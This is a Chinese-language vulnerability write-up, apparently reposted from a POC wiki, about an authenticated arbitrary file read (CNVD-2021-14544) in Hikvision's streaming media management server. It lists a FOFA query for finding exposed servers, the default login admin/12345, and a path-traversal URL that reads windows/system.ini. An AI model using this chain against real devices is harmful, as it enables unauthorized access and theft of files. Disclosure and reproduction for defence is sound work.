HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544

  • A+
所属分类:安全漏洞

HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544



:漏洞描述🐑

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。

杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息


二:  漏洞影响🐇


杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5



三:  漏洞复现🐋

FOFA:title="流媒体管理服务器"

登录页面如下, 默认账号密码为 admin/12345

HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544

POC如下,访问如下Url下载 system.ini文件

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544

成功读取 C:/windows/system.ini



 四:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

投稿的师傅联系私聊我~

别忘了Github下载完给个小星星⭐





本文始发于微信公众号(PeiQi文库):HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: